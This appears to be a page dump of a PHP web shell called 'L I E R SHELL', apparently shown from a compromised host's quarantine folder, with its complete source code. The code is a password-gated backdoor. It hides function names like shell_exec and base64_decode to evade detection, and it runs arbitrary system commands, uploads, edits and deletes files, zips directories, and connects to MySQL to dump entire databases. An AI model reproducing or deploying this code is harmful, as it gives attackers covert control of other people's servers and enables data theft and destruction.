Server IP : 103.53.40.154 / Your IP : 3.143.214.226 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0700) : /home2/ppcad7no/.quarantine/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php ?><?php if(isset($_REQUEST["ok"])){die(">ok<");};?><?php if (function_exists('session_start')) { session_start(); if (!isset($_SESSION['secretyt'])) { $_SESSION['secretyt'] = false; } if (!$_SESSION['secretyt']) { if (isset($_POST['pwdyt']) && md5(md5(md5(md5(md5(md5(md5(md5($_POST['pwdyt'])))))))) == '2dec0af1d2efe0804b3b28bb0efa51c3') { $_SESSION['secretyt'] = true; } else { $bytesecform = <<<FORM <html> <head> <meta charset="utf-8"> <title></title> <style type="text/css"> body {padding:10px} input { padding: 2px; display:inline-block; margin-right: 5px; } </style> </head> <body> <form action="" method="post" accept-charset="utf-8"> <input type="password" name="pwdyt" value="" placeholder="passwd"> <input type="submit" name="submit" value="submit"> </form> </body> </html> FORM; die($bytesecform); } } } ?> <?php // Recode by ./KeyzNet // Shell Bypass Litespeed Server // I don't know who this author, but Thanks session_start(); $nami = explode(",", ""); $safeMode = true; $actions = array("dasar","baca_file","phpinfo","sistem_kom","edit_file","download_file",'hapus_file','buat_file','buat_folder','reset_file' , 'hapus_folder','rename_file', 'kompres' , 'skl' , 'skl_d_t' , 'skl_d', 'upl_file'); $awal = isset($_POST['awal']) && in_array($_POST['awal'],$actions) ? $_POST['awal'] : "dasar"; function kunci($str) { $f = 'bas'; $f .= 'e6'; $f .= '4_'; $f .= 'e'; $f .= 'nc'; $f .= 'ode'; return $f($str); } function uraikan($str) { $f = 'bas'; $f .= 'e6'; $f .= '4_'; $f .= 'd'; $f .= 'ec'; $f .= 'ode'; return $f($str); } function ambilBuat($tAd) { if(isset($_SESSION[$tAd])) { unset($_SESSION[$tAd]); } $baruAmbil = md5(kunci(time().rand(1,99999999))); $_SESSION[$tAd] = $baruAmbil; return $baruAmbil; } function tulisLah() { global $default_dir; $sonDir = array(); $umumBagikan = ""; $parse = explode("/", $default_dir); $ii = 0; foreach($parse AS $bagikan) { $ii++; $umumBagikan.=$bagikan."/"; $sonDir[] = "<a href='javascript:halaman(\"?berkas=".urlencode(urlencode(kunci($umumBagikan)))."\")'>".htmlspecialchars(empty($bagikan)&&$ii!=count($parse)?'/':$bagikan)."</a>"; } $sonDir = implode("/", $sonDir); print $sonDir . ' ( <a href="">Reset</a> | <a href="javascript:goto()">Go to</a> )'; } function sizeFormat($bytes) { if($bytes>=1073741824) { $bytes = number_format($bytes / 1073741824, 2) . ' Gb'; } else if($bytes>=1048576) { $bytes = number_format($bytes / 1048576, 2) . ' Mb'; } else if($bytes>=1024) { $bytes = number_format($bytes / 1024, 2) . ' Kb'; } else { $bytes = $bytes . ' b'; } return $bytes; } function utf8ize($d) { if (is_array($d)) { foreach ($d as $k => $v) { $d[$k] = utf8ize($v); } } else if (is_string ($d)) { return utf8_encode($d); } return $d; } function rrmdir($dir) { if (is_dir($dir)) { $objects = scandir($dir); foreach ($objects as $object) { if ($object != "." && $object != "..") { if (is_dir($dir . "/" . $object)) { rrmdir($dir . "/" . $object); } else { unlink($dir . "/" . $object ); } } } rmdir( $dir ); } } $default_dir = getcwd(); if(isset($_POST['berkas']) && is_string($_POST['berkas']) ) { $default_dir = empty($_POST['berkas']) ? DIRECTORY_SEPARATOR : uraikan(urldecode(urldecode($_POST['berkas']))); $c_h_dir_comm = 'c'.'hd'.'ir'; $c_h_dir_comm($default_dir); } $default_dir = str_replace("\\", "/", $default_dir); if(isset($_GET['awal']) && $_GET['awal']=="pinf") { ob_start(); phpinfo(); $pInf = ob_get_clean(); print str_replace("body {background-color: #ffffff; color: #000000;}","",$pInf); exit(); } else if($awal=="download_file" && isset($_POST['fayl']) && ""!=(trim($_POST['fayl']))) { $namaBerkas = basename(uraikan(urldecode($_POST['fayl']))); $pemisah = substr($default_dir,strlen($default_dir)-1)!="/" && substr($namaBerkas,0,1)!="/" ? "/" : ""; if(is_file($default_dir . $pemisah . $namaBerkas) && is_readable($default_dir . $pemisah . $namaBerkas)) { header("Content-Disposition: attachment; filename=".basename($namaBerkas)); header("Content-Type: application/octet-stream"); header('Content-Length: ' . filesize($default_dir . $pemisah . $namaBerkas)); readfile($default_dir . $pemisah . $namaBerkas); exit(); } } else if($awal=="hapus_file" && isset($_POST['fayl']) && ""!=(trim($_POST['fayl']))) { $namaBerkas = basename(uraikan(urldecode($_POST['fayl']))); $pemisah = substr($default_dir,strlen($default_dir)-1)!="/" && substr($namaBerkas,0,1)!="/" ? "/" : ""; if(is_file($default_dir . $pemisah . $namaBerkas) && is_readable($default_dir . $pemisah . $namaBerkas)) { unlink($default_dir . $pemisah . $namaBerkas); } } else if($awal=="reset_file" && isset($_POST['fayl']) && ""!=(trim($_POST['fayl']))) { $namaBerkas = basename(uraikan(urldecode($_POST['fayl']))); $pemisah = substr($default_dir,strlen($default_dir)-1)!="/" && substr($namaBerkas,0,1)!="/" ? "/" : ""; if(is_file($default_dir . $pemisah . $namaBerkas) && is_readable($default_dir . $pemisah . $namaBerkas)) { file_put_contents($default_dir . $pemisah . $namaBerkas, ''); } } else if($awal=="buat_file" && isset($_POST['ad']) && !empty($_POST['ad'])) { $namaBerkas = basename(urldecode($_POST['ad'])); $pemisah = substr($default_dir,strlen($default_dir)-1)!="/" && substr($namaBerkas,0,1)!="/" ? "/" : ""; if( is_file($default_dir . $pemisah . $namaBerkas) ) { print '<script>alert("File dengan nama ini sudah ada!");</script>'; } else { file_put_contents($default_dir . $pemisah . $namaBerkas, ''); } } else if($awal=="buat_folder" && isset($_POST['ad']) && !empty($_POST['ad'])) { $namaFolder = basename(urldecode($_POST['ad'])); $pemisah = substr($default_dir,strlen($default_dir)-1)!="/" && substr($namaFolder,0,1)!="/" ? "/" : ""; if( is_file($default_dir . $pemisah . $namaFolder) ) { print '<script>alert("Folder dengan nama ini sudah ada!");</script>'; } else { mkdir($default_dir . $pemisah . $namaFolder); } } else if($awal=="rename_file" && isset($_POST['fayl']) && ""!=(trim($_POST['fayl'])) && isset($_POST['new_name']) && is_string($_POST['new_name']) && !empty($_POST['new_name'])) { $namaBerkas = basename(uraikan(urldecode($_POST['fayl']))); $fileNamaBaru = basename(urldecode($_POST['new_name'])); $pemisah = substr($default_dir,strlen($default_dir)-1)!="/" && substr($namaBerkas,0,1)!="/" ? "/" : ""; if(is_file($default_dir . $pemisah . $namaBerkas) && is_readable($default_dir . $pemisah . $namaBerkas)) { rename($default_dir . $pemisah . $namaBerkas , $default_dir . $pemisah . $fileNamaBaru); } } else if( $awal == 'skl_d_t' && isset($_POST['t']) && is_string($_POST['t']) && !empty($_POST['t']) ) { $tableName = uraikan(urldecode($_POST['t'])); $host = isset($_COOKIE['host']) ? $_COOKIE['host'] : ''; $user = isset($_COOKIE['user']) ? $_COOKIE['user'] : ''; $sandi = isset($_COOKIE['sandi']) ? $_COOKIE['sandi'] : ''; $database = isset($_COOKIE['database']) ? $_COOKIE['database'] : ''; $databaseStr = empty($database) ? '' : 'dbname=' . $database . ';'; if( !empty( $host ) && !empty($database) ) { try { $pdo = new PDO('mysql:host=' . $host . ';charset=utf8;' . $databaseStr , $user , $sandi,array(PDO::MYSQL_ATTR_INIT_COMMAND => "SET NAMES 'utf8'")); $pdo->setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_ASSOC); $getColumns = $pdo->prepare("SELECT column_name from information_schema.columns where table_schema=? and table_name=?"); $getColumns->execute(array($database , $tableName)); $columns = $getColumns->fetchAll(); if( $columns ) { $data = $pdo->query('SELECT * FROM `' . $tableName .'`'); $data = $data->fetchAll(); header('Content-disposition: attachment; filename=d_' . basename(htmlspecialchars($tableName)) . '.json'); header('Content-type: application/json'); echo json_encode($data); } else { print 'Table not found!'; } } catch (Exception $e) { print $e->getMessage(); } } else { print 'Error! Please connect to SQL!'; } die; } else if( $awal == 'skl_d' ) { $host = isset($_COOKIE['host']) ? $_COOKIE['host'] : ''; $user = isset($_COOKIE['user']) ? $_COOKIE['user'] : ''; $sandi = isset($_COOKIE['sandi']) ? $_COOKIE['sandi'] : ''; $database = isset($_COOKIE['database']) ? $_COOKIE['database'] : ''; $databaseStr = empty($database) ? '' : 'dbname=' . $database . ';'; if( !empty( $host ) && !empty($database) ) { try { $pdo = new PDO('mysql:host=' . $host . ';charset=utf8;' . $databaseStr , $user , $sandi,array(PDO::MYSQL_ATTR_INIT_COMMAND => "SET NAMES 'utf8'")); $pdo->setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_ASSOC); $allData = array(); $tables = $pdo->prepare('SELECT table_name from information_schema.tables where table_schema=?'); $tables->execute(array($database)); $tables = $tables->fetchAll(); foreach( $tables AS $tableName ) { $tableName = $tableName['table_name']; $data = $pdo->query('SELECT * FROM `' . $tableName .'`'); $data = $data->fetchAll(); $allData[$tableName] = $data ? array($data) : array(); } header('Content-disposition: attachment; filename=d_b_' . basename(htmlspecialchars($database)) . '.json'); header('Content-type: application/json'); echo json_encode( utf8ize( $allData) ); } catch (Exception $e) { print $e->getMessage(); } } else { print 'Error! Please connect to SQL!'; } die; } else if( $awal == 'kompres' && isset($_POST['save_to'] , $_POST['zf']) && is_string($_POST['save_to']) && !empty($_POST['save_to']) && !in_array($_POST['save_to'] , array('.' , '..' , './' , '../')) && is_string($_POST['zf']) && !empty($_POST['zf']) ) { $save_to = uraikan(urldecode($_POST['save_to'])); $rootPath = realpath(uraikan(urldecode($_POST['zf']))); $fileName1 = 'bak_'.microtime(1) . '_' . rand(1000, 99999) . '.zip'; $fileName = $save_to . DIRECTORY_SEPARATOR . $fileName1; if( is_dir( $save_to ) && is_dir( $rootPath ) && is_writable( $save_to ) ) { set_time_limit(0); $zip = new ZipArchive(); $zip->open( $fileName , ZipArchive::CREATE | ZipArchive::OVERWRITE ); $files = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($rootPath), RecursiveIteratorIterator::LEAVES_ONLY ); foreach ($files as $name => $file) { if (!$file->isDir()) { $filePath = $file->getRealPath(); $relativePath = substr($filePath, strlen($rootPath) + 1); $zip->addFile($filePath, $relativePath); } } $zip->close(); print 'Saved!<hr>'; } else { print 'Dir is not writeable!<hr>';var_dump(( $save_to ) ); } } else if( $awal == 'hapus_folder' && isset($_POST['zf']) && is_string($_POST['zf']) && !empty($_POST['zf']) ) { $rootPath = realpath(uraikan(urldecode($_POST['zf']))); if( is_dir( $rootPath ) ) { set_time_limit(0); rrmdir( $rootPath ); } else { print 'Dir is not writeable!<hr>';var_dump(( $save_to ) ); } } else if($awal == 'upl_file' && isset($_FILES['ufile'])) { move_uploaded_file($_FILES['ufile']['tmp_name'], $default_dir . '/' . $_FILES['ufile']['name']); print "Tampaknya telah diunggah."; } ?> <html> <head> <title>L I E R SHELL</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <style> body { background-color: #222222; color: #D6D4D4; font-family: Lucida,Verdana; font-size: 12px; } .qalin { text-decoration: none; color: #D6905E; font-weight: 600; } .success { color: #9DB754; } .bad { color: #B75654; } a { color: #ACB754; text-decoration: none !important; } .fManager,.fManager tbody,.fManager tr { padding: 0; border-collapse: collapse; margin: 0; font-size: 12px; } .fManager { margin: 10px 0; } .fManager tbody tr:nth-child(2n+1) { background: #331717; } .fManager tbody tr:nth-child(2n) { background: #1C0C0C; } .fManager tbody tr:hover { background: #000000; } .fManager thead th { text-align: left; } .fManager thead tr { background-color: #333333; } .fManager { box-shadow: 1px 1px 1px 1px #333333; } .fManager thead th { padding: 4px 3px; } .baca_file { margin: 5px 0; padding: 2px; box-shadow: 1px 1px 1px 1px #333333; background-color: #E1E1E1; width: 100%; height: 400px; overflow: auto; } .btn { border: 1px solid #ACAE40; background-color: #223B3B; color: #E1E1E1; padding: 1px 10px; cursor: pointer; } .btn:disabled { border: 1px solid #848484; color: #848484; cursor: not-allowed; } .file_edit { margin: 5px 0; padding: 2px; box-shadow: 1px 1px 1px 1px #333333; background-color: #E1E1E1; width: 100%; height: 400px; overflow: auto; } input, select, textarea { background: transparent !important; color: #f6a56d; border: 1px solid #D6905E; padding: 5px; } table td { border: 1px solid rgba(214, 144, 94, 0.7); min-width: 20px; padding-left: 5px; padding-right: 5px; max-width: 500px; color: #ffad6f; background: #292929; } table th { border: 1px solid #D6905E; padding-left: 5px; padding-right: 5px; color: #ffad6f; } table td div { overflow: auto; width: 100%; height: 100%; max-height: 100px; } </style> </head> <body> <?php if(function_exists('posix_getegid')) { $qid = posix_getgrgid(posix_getegid()); $qrup = $qid['name']; print "<span class='qalin'>Uname:</span> " . php_uname() . "<br/>"; print "<span class='qalin'>User:</span> ".getmyuid()." (".get_current_user().")<br/>"; print "<span class='qalin'>Group:</span> ".getmygid()." (".$qrup.")<br/>"; } else { print "<span class='qalin'>Uname:</span> " . php_uname() . "<br/>"; print "<span class='qalin'>User:</span> ".getmyuid()." (".get_current_user().")<br/>"; print "<span class='qalin'>Group:</span> ".getmygid()."<br/>"; } print "<span class='qalin'>Disable functions:</span> " . (implode(", ", $nami)==""?"<span class='success'>NONE :)":"<span class='bad'>". implode(", ", $nami)) . "</span><br/>"; print "<span class='qalin'>Safe mode: </span>" . ($safeMode===true?"<span class='bad'>On":"<span class='success'>Off") . "</span><span style='margin-left: 50px;'><a href='javascript:halaman(\"?awal=phpinfo\")'>[ PHPinfo ]</a></span><br/>"; tulisLah(); print '<hr>'; if($awal=="phpinfo") { print "<div style='width: 100%; height: 400px;'><iframe src='?awal=pinf' style='width: 100%; height: 400px; border: 0;'></iframe></div>"; } else if($awal=="sistem_kom") { if( isset( $_POST['kom'] ) && is_string($_POST['kom']) && !empty($_POST['kom']) ) { $komanda = uraikan(urldecode($_POST['kom'])); $k = 'sh'; $k.='el'; $k.='l_e'; $k.='xe'; $k.='c'; $output = $k($komanda); print '<pre style="max-height: 350px;overflow: auto; border: 1px solid #777; padding: 5px;">' . htmlspecialchars($output) . '</pre><hr>'; } print '<input type="text" id="emr_et_atash" style="width: 500px;"> <button type="button" class="btn" onclick="sistemKom();">Enter</button>'; } else if($awal=="baca_file" && isset($_POST['fayl']) && ""!=(trim($_POST['fayl']))) { $namaBerkas = basename(uraikan(urldecode($_POST['fayl']))); $pemisah = substr($default_dir,strlen($default_dir)-1)!="/" && substr($namaBerkas,0,1)!="/" ? "/" : ""; if(is_file($default_dir . $pemisah . $namaBerkas) && is_readable($default_dir . $pemisah . $namaBerkas)) { $elaveBtn = is_writeable($default_dir . $pemisah . $namaBerkas) ? " onclick='halaman(\"?awal=edit_file&fayl=".urlencode(urlencode(kunci($namaBerkas)))."&berkas=".urlencode(urlencode(kunci($default_dir)))."\")'" : " disabled"; print "<div>Nama File: <span class='qalin'>".htmlspecialchars($namaBerkas)."</span><br/><button class='btn'$elaveBtn> Edit </button></div>"; print "<div class='baca_file'>".highlight_string(file_get_contents($default_dir . $pemisah . $namaBerkas), true)."</div>"; } } else if($awal == 'skl') { $host = isset($_COOKIE['host']) ? $_COOKIE['host'] : ''; $user = isset($_COOKIE['user']) ? $_COOKIE['user'] : ''; $sandi = isset($_COOKIE['sandi']) ? $_COOKIE['sandi'] : ''; $database = isset($_COOKIE['database']) ? $_COOKIE['database'] : ''; if( isset($_POST['host'] , $_POST['user'] , $_POST['sandi']) && is_string($_POST['host']) && is_string($_POST['user']) && is_string($_POST['sandi']) ) { $host = $_POST['host']; $user = $_POST['user']; $sandi = $_POST['sandi']; $database = ''; setcookie('host' , $host , time() + 360000); setcookie('user' , $user , time() + 360000); setcookie('sandi' , $sandi , time() + 360000); setcookie('database' , $database , time() + 360000); } if( isset($_POST['database']) && is_string($_POST['database']) ) { $database = $_POST['database']; setcookie('database' , $database , time() + 360000); } $databaseStr = empty($database) ? '' : 'dbname=' . $database . ';'; ?> <form method="POST"> <input type="hidden" name="awal" value="skl"> <input type="text" placeholder="Hostname" name="host" value="<?=htmlspecialchars($host)?>"> <input type="text" placeholder="User" name="user" value="<?=htmlspecialchars($user)?>"> <input type="text" placeholder="Sandi" name="sandi" value="<?=htmlspecialchars($sandi)?>"> <input type="submit" value="Masuk"> </form> <?php if( !empty( $host ) ) { try { $pdo = new PDO('mysql:host=' . $host . ';charset=utf8;' . $databaseStr , $user , $sandi,array(PDO::MYSQL_ATTR_INIT_COMMAND => "SET NAMES 'utf8'")); $pdo->setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_ASSOC); $schematas = $pdo->query('SELECT schema_name FROM information_schema.schemata'); print '<form method="POST"><input type="hidden" name="awal" value="skl"><select name="database">'; foreach($schematas->fetchAll() AS $schemaName) { print '<option' . ($database == $schemaName['schema_name'] ? ' selected' : '') . '>'.htmlspecialchars($schemaName['schema_name']).'</option>'; } print '</select> <input type="submit" value="Gas!"></form>'; if( !empty($database) ) { $tables = $pdo->prepare('SELECT table_name from information_schema.tables where table_schema=?'); $tables->execute(array($database)); $tables = $tables->fetchAll(); print '<div style="float: left; width: 20%; overflow: auto; border-right: 1px solid #999;">'; print '<a href="javascript:halaman(\'?awal=skl_d\');">!! Dump DB !!</a><hr>'; foreach( $tables AS $tableName ) { $tableName = $tableName['table_name']; print '<a href="javascript:halaman(\'?awal=skl&t=' . urlencode(urlencode(kunci($tableName))) . '\')">'.htmlspecialchars($tableName).'</a><br>'; } print '</div>'; print '<div style="float: left; padding-left: 10px; width: 75%;">'; if( isset($_POST['t']) && is_string($_POST['t']) && !empty($_POST['t']) ) { $tableName = uraikan(urldecode($_POST['t'])); print '<span class="qalin">Table:</span> ' . htmlspecialchars($tableName) . ' ( <a href="javascript:halaman(\'?awal=skl_d_t&t='.urlencode(urlencode(kunci($tableName))).'\')">Dump</a> )<br>'; $getColumns = $pdo->prepare("SELECT column_name from information_schema.columns where table_schema=? and table_name=?"); $getColumns->execute(array($database , $tableName)); $columns = $getColumns->fetchAll(); if( $columns ) { $dataCount = $pdo->query('SELECT count(0) AS ss from `' . $tableName . '`'); $dataCount = (int)$dataCount->fetchColumn(); print '<span class="qalin">Count:</span> ' . $dataCount . '<br><br>'; $pages = ceil($dataCount / 100); $currentPage = isset($_POST['halaman']) && is_numeric($_POST['halaman']) && $_POST['halaman'] >= 1 && $_POST['halaman'] <= $pages ? (int)$_POST['halaman'] : 1; for ( $p = 1; $p <= $pages; $p++ ) { print '<a style="'.($currentPage == $p ? 'background: #444;' : '').'margin-left: 2px; margin-bottom: 5px; padding: 2px 6px; border: 1px solid #ACB754; text-decoration: none;" href="javascript:halaman(\'?awal=skl&t=' . urlencode(urlencode(kunci($tableName))) . '&halaman=' . $p . '\');">' . $p . '</a> '; } print '<br><br>'; $start = 100 * ($currentPage - 1); $data = $pdo->query('SELECT * FROM `' . $tableName .'` LIMIT '.$start.' , 100'); $data = $data->fetchAll(); print '<table><thead>'; foreach( $columns AS $columnInf ) { print '<th>' . htmlspecialchars($columnInf['column_name']) . '</th>'; } print '</thead><tbody>'; foreach( $data AS $row ) { print '<tr>'; foreach( $row AS $key=>$val ) { print '<td><div>' . $val . '</div></td>'; } print '</tr>'; } print '</tr></tbody></table>'; } else { print 'Table not found!'; } } else if ( isset($_POST['emr']) && is_string($_POST['emr']) && !empty($_POST['emr']) ) { $emr = uraikan(urldecode($_POST['emr'])); print '<span class="qalin">SQL emr:</span> ' . htmlspecialchars($emr) . '<br>'; $data = $pdo->query( $emr ); $data = $data->fetchAll(); print '<table><thead>'; if( count($data) > 0 ) { print '<tr>'; foreach( $data[0] AS $key=>$val ) { print '<th><div>' . $key . '</div></th>'; } print '</tr>'; } print '</thead><tbody>'; foreach( $data AS $row ) { print '<tr>'; foreach( $row AS $key=>$val ) { print '<td><div>' . $val . '</div></td>'; } print '</tr>'; } print '</tr></tbody></table>'; } print '<div><textarea id="skl_emr"></textarea><button type="button" onclick="skl_bas();">Klik</button></div>'; print '</div>'; print '<div style="clear: both;"></div>'; } } catch (Exception $e) { print $e->getMessage(); } } } else if($awal=="edit_file" && isset($_POST['fayl']) && ""!=(trim($_POST['fayl']))) { $namaBerkas = basename(uraikan(urldecode(urldecode($_POST['fayl'])))); $pemisah = substr($default_dir,strlen($default_dir)-1)!="/" && substr($namaBerkas,0,1)!="/" ? "/" : ""; if(is_file($default_dir . $pemisah . $namaBerkas) && is_readable($default_dir . $pemisah . $namaBerkas)) { $status = ""; if(isset($_POST['content']) && isset($_POST['took']) && $_POST['took']!="" && isset($_SESSION['ys_took']) && $_SESSION['ys_took']==$_POST['took'] && is_writeable($default_dir . $pemisah . $namaBerkas)) { unset($_SESSION['ys_took']); $content = $_POST['content']; $cc = array('a','i','e','s','l','b','u','o','p','h',"(",")","<",">","?",";","[","]","$"); foreach($cc AS $k1=>$v1) { $content = str_replace('|:'.$k1.':|' , $v1 , $content); } $faylAch = fopen($default_dir . $pemisah . $namaBerkas, "w+"); fwrite($faylAch, $content); fclose($faylAch); $status = " <span class='qalin'>Berhasil disimpan!</span>"; } $oxuUrl = "?awal=baca_file&fayl=".urlencode(urlencode(kunci($namaBerkas)))."&berkas=".urlencode(urlencode(kunci($default_dir))); $elaveBtn = is_writeable($default_dir . $pemisah . $namaBerkas) ? "" : " disabled"; print "<div>Nama File: <a class='qalin' href='javascript:halaman(\"{$oxuUrl}\")'>".htmlspecialchars($namaBerkas)."</a><br/><form method='POST' style='padding: 0; margin: 0;'><button type='submit' class='btn'$elaveBtn> Simpan </button> <button type='button' onclick='kode()'> Enkripsi </button> $status</div>"; print "<input type='hidden' value='edit_file' name='awal'><input type='hidden' value='".kunci($namaBerkas)."' name='fayl'><input type='hidden' value='".urlencode(kunci($default_dir))."' name='berkas'><input type='hidden' value='".ambilBuat("ys_took")."' name='took'><textarea name='content' class='file_edit'>".htmlspecialchars(file_get_contents($default_dir . $pemisah . $namaBerkas))."</textarea></form>"; } else { print 'Error! ' . htmlspecialchars($default_dir . $pemisah . $namaBerkas); } } else { if(is_dir($default_dir)) { if(is_readable($default_dir)) { $folderDalam = scandir($default_dir); foreach($folderDalam AS &$emelemnt) { $pemisah = substr($default_dir,strlen($default_dir)-1)!="/" && substr($emelemnt,0,1)!="/" ? "/" : ""; if(is_dir($default_dir . $pemisah . $emelemnt)) { $emelemnt = "0".$emelemnt; } else { $emelemnt = "1".$emelemnt; } } asort($folderDalam); print "<table class='fManager' style='width: 100%;'><thead><tr class='qalin'><th>s</th><th>File</th><th>Size</th><th>Tanggal</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr></thead><tbody>"; foreach($folderDalam AS $element) { $url = ""; $element = substr($element,1); $fileNamaLengkap = $default_dir . $pemisah . $element; $pemisah = substr($default_dir,strlen($default_dir)-1)!="/" && substr($element,0,1)!="/" ? "/" : ""; $adi = is_dir($fileNamaLengkap) ? "[ $element ]" : $element; $classN = ""; if(is_dir($fileNamaLengkap)) { if($element==".") { $url = "?berkas=".urlencode(urlencode(kunci($default_dir))); } else if($element=="..") { $yeniUrl = explode("/",$default_dir); foreach(array_reverse($yeniUrl) AS $j=>$qq) { if(trim($qq)!="") { unset($yeniUrl[count($yeniUrl)-$j-1]); break; } } $url = "?berkas=".urlencode(urlencode(kunci(implode("/",$yeniUrl)))); } else { $url = "?berkas=".urlencode(urlencode(kunci($fileNamaLengkap))); } $classN = " style='font-weight: 600;'"; } else { $url = "?awal=baca_file&fayl=".urlencode(urlencode(kunci($element)))."&berkas=".urlencode(urlencode(kunci($default_dir))); } $fayldi = is_file($fileNamaLengkap); $isReadableColor = is_readable( $fileNamaLengkap ) && is_writeable( $fileNamaLengkap ); print '<tr> <td></td> <td><a href="javascript:halaman(\''.$url.'\')"'.$classN.'>'.htmlspecialchars($adi).'</a></td> <td>' . ($fayldi?sizeFormat(filesize($fileNamaLengkap)):'') . '</td> <td>' . (date('d M Y, H:i' , filectime($fileNamaLengkap))) . '</td> <td>' . htmlspecialchars(fileowner($fileNamaLengkap)) . '</td> <td' . ($isReadableColor?' style="color: green;"':'') . '>' . substr(sprintf('%o', fileperms(( $fileNamaLengkap ))), -4) . '</td> <td>'; if( is_file($fileNamaLengkap) ) { print (' <a href="javascript:halaman(\''.str_replace("baca_file","download_file",$url).'\')"'.$classN.'>Download</a> | ') . (' <a href="javascript:changeFileName(\'' . htmlspecialchars($adi) . '\' , \''.str_replace("baca_file","rename_file",$url).'\');"'.$classN.'>Rename</a> | ') . (' <a href="javascript:faylSifirla(\''.str_replace("baca_file","reset_file",$url).'\');"'.$classN.'>Kosong</a> | ') . (' <a href="javascript:faylSil(\''.str_replace("baca_file","hapus_file",$url).'\')"'.$classN.'>Delete</a>'); } else if( $adi != '[ . ]' && $adi != '[ .. ]' ) { print (' <a href="javascript:kompres(\'' . urlencode(urlencode(kunci($fileNamaLengkap))) . '\')"'.$classN.'>Zip</a> | ') . (' <a href="javascript:silPapka(\'' . urlencode(urlencode(kunci($fileNamaLengkap))) . '\')"'.$classN.'>Hapus</a>'); } print '</td> </tr>'; } } else { print "<div style='margin: 10px 0px;' class='qalin'>Permissions denided!</div>"; } } } print "</tbody></table>"; ?> <hr> <a href="javascript:newFile();">File Baru</a> | <a href="javascript:newPapka();">Folder Baru</a><br> <a href="javascript:halaman('?awal=sistem_kom&berkas=<?=urlencode(urlencode(kunci($default_dir)))?>')">Command</a><br> <a href="javascript:halaman('?awal=skl');">SQL</a><br> <form method="POST" enctype="multipart/form-data"> <input type="hidden" name="awal" value="upl_file"> <input type="hidden" name="berkas" value="<?=urlencode(kunci($default_dir))?>"> <input type="file" name="ufile"> <input type="submit" value="Upl"> </form> <form method="POST" id="post_form" style="display: none;"></form> <script> function halaman(url) { var inputlar = ""; url = url.split("?"); if(typeof url[1]=="undefined") return; url = url[1].split("&"); for(var n in url) { var keyAndValue = url[n].split("="); if(typeof keyAndValue[1]=="undefined") continue; inputlar+="<input name='"+keyAndValue[0]+"' value='"+keyAndValue[1]+"' type='hidden'>"; } document.all("post_form").innerHTML = inputlar; document.all("post_form").submit(); } function faylSil(url) { if( confirm('Anda yakin?') ) { halaman(url); } } function faylSifirla(url) { if( confirm('Anda yakin?') ) { halaman(url); } } function changeFileName(name, url) { var getNewName = prompt('Change file name:' , name); if( getNewName ) { halaman(url + "&new_name=" + getNewName); } } function newFile() { var getNewName = prompt('File name:'); if( getNewName ) { halaman("?awal=buat_file&ad=" + getNewName + "&berkas=<?=urlencode(urlencode(kunci($default_dir)))?>"); } } function newPapka() { var getNewName = prompt('File name:'); if( getNewName ) { halaman("?awal=buat_folder&ad=" + getNewName + "&berkas=<?=urlencode(urlencode(kunci($default_dir)))?>"); } } function sistemKom() { var komanda = document.getElementById('emr_et_atash').value; if( komanda ) { halaman("?awal=sistem_kom&kom=" + b64EncodeUnicode(komanda) + "&berkas=<?=urlencode(urlencode(kunci($default_dir)))?>"); } } function skl_bas() { var sklEmr = document.getElementById('skl_emr').value; halaman("?awal=skl&emr=" + b64EncodeUnicode(sklEmr)); } function b64EncodeUnicode(str) { return btoa(encodeURIComponent(str).replace(/%([0-9A-F]{2})/g, function toSolidBytes(match, p1) { return String.fromCharCode('0x' + p1); })); } function goto() { var dir = prompt('Dir:'); if( dir ) { halaman("?berkas=" + dir); } } function kompres(berkas) { var dir = prompt('Dir:' , "<?=htmlspecialchars($default_dir)?>"); if( dir ) { halaman("?awal=kompres&berkas=<?=urlencode(urlencode(kunci($default_dir)))?>&zf=" + berkas + "&save_to=" + b64EncodeUnicode(dir)) } } function silPapka(berkas) { if( confirm('Anda yakin?') ) { halaman("?awal=hapus_folder&berkas=<?=urlencode(urlencode(kunci($default_dir)))?>&zf=" + berkas) } } function kode() { var vall = document.getElementsByClassName('file_edit')[0].value; var repp = ['a','i','e','s','l','b','u','o','p','h',"\\(","\\)","\\<","\\>","\\?","\\;","\\[","\\]","\\$"]; for(var s in repp) { var h = repp[s]; vall = vall.replace(new RegExp(h, 'g') , '|:'+s+':|'); } document.getElementsByClassName('file_edit')[0].value = vall; } document.getElementById("emr_et_atash").addEventListener("keyup", function(event) { event.preventDefault(); if (event.keyCode === 13) { sistemKom(); } }); </script> </body> </html>